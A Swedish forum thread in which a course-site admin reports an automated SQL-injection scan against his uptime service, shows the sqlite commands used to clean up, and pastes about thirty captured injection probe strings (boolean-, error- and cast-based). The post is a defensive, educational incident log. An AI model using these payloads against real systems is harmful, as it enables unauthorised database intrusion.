PHP och SQL injections (uptime-attack)

  • Författare
  • Meddelande
Användarvisningsbild

mos

dbwebb

  • Inlägg: 11063
  • Blev medlem: 10 nov 2011, 09:52
  • Ort: Ronneby / Bankeryd

PHP och SQL injections (uptime-attack)

Inlägg11 okt 2017, 13:35

Jag ser att någon använder ett automatiskt testprogram på vår tjänst uptime.dbwebb.se och testar efter möjligheter till SQL injections.

Jag skall rensa undan och överväga att lägga in en form av kontroll så att tjänsten inte ligger helt öppen. Men tilsl jag gör det så kan man kika på resultatlistan och nu se hur ett automatiserat program kör tester för att se om webbplatsen kan exploitas utifrån SQL injections.

Kika på (scrolla ned tills du ser rader som påminner om SQL-satser):
https://uptime.dbwebb.se
...
..:
.... /mos
Användarvisningsbild

thulin

troubleshooter

  • Inlägg: 514
  • Blev medlem: 30 dec 2015, 15:33
  • Ort: Skurup

Re: PHP och SQL injections (uptime-attack)

Inlägg08 nov 2017, 21:44

Nåt nytt angående detta?
/Thulin
Användarvisningsbild

mos

dbwebb

  • Inlägg: 11063
  • Blev medlem: 10 nov 2011, 09:52
  • Ort: Ronneby / Bankeryd

Re: PHP och SQL injections (uptime-attack)

Inlägg09 nov 2017, 16:19

Jag städade bort alla försök till attacken. Så nu ser det bra ut igen.
Kod: Markera allt
sqlite> delete from participant where id in (11, 12, 13) or (id >= 53 and id <= 230);
sqlite> delete from participant where id in (7, 47);                                 
sqlite> delete from participant where id in (46);                                     
sqlite> delete from participant where id in (231);                                   
sqlite> delete from participant where id in (43, 44);           


Här är några exempel på hur injektionskoden ser ut.
Kod: Markera allt
72|i.),,),,'("
73|i'vlmeDH<'">kpYbLR
74|i) AND 2093=9114 AND (9386=9386
75|i) AND 9282=9282 AND (9014=9014
76|i) AND 9393=2050 AND (6756=6756
77|i AND 6494=7505
78|i AND 9282=9282
79|i AND 1967=9715
80|i') AND 3756=1815 AND ('EyXg'='EyXg
81|i') AND 9282=9282 AND ('ohKt'='ohKt
82|i') AND 1161=4526 AND ('EGKZ'='EGKZ
83|i' AND 7145=6521 AND 'RUfN'='RUfN
84|i' AND 9282=9282 AND 'fYfI'='fYfI
85|i' AND 2195=7071 AND 'Bgab'='Bgab
86|i%' AND 7310=8828 AND '%'='
87|i%' AND 9282=9282 AND '%'='
88|i%' AND 3987=4630 AND '%'='
89|i AND 6441=3692-- fFdH
90|i AND 9282=9282-- time
91|i AND 8800=8978-- hCJp
92|(SELECT (CASE WHEN (4197=8952) THEN 4197 ELSE 4197*(SELECT 4197 FROM INFORMATION_SCHEMA.PLUGINS) END))
93|(SELECT (CASE WHEN (9669=9669) THEN 9669 ELSE 9669*(SELECT 9669 FROM INFORMATION_SCHEMA.PLUGINS) END))
94|(SELECT (CASE WHEN (8952=3189) THEN 8952 ELSE 8952*(SELECT 8952 FROM INFORMATION_SCHEMA.PLUGINS) END))
95|i) AND (SELECT 9407 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(9407=9407,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (9666=9666
96|i AND (SELECT 9407 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(9407=9407,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
97|i') AND (SELECT 9407 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(9407=9407,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('yatm'='yatm
98|i' AND (SELECT 9407 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(9407=9407,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'eNQV'='eNQV
99|i%' AND (SELECT 9407 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(9407=9407,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='
100|i AND (SELECT 9407 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(9407=9407,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ntbz
101|i) AND 8511=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (8511=8511) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND (7349=7349
...
..:
.... /mos

Vilka är online

Användare som besöker denna kategori: Inga registrerade användare och 22 gäster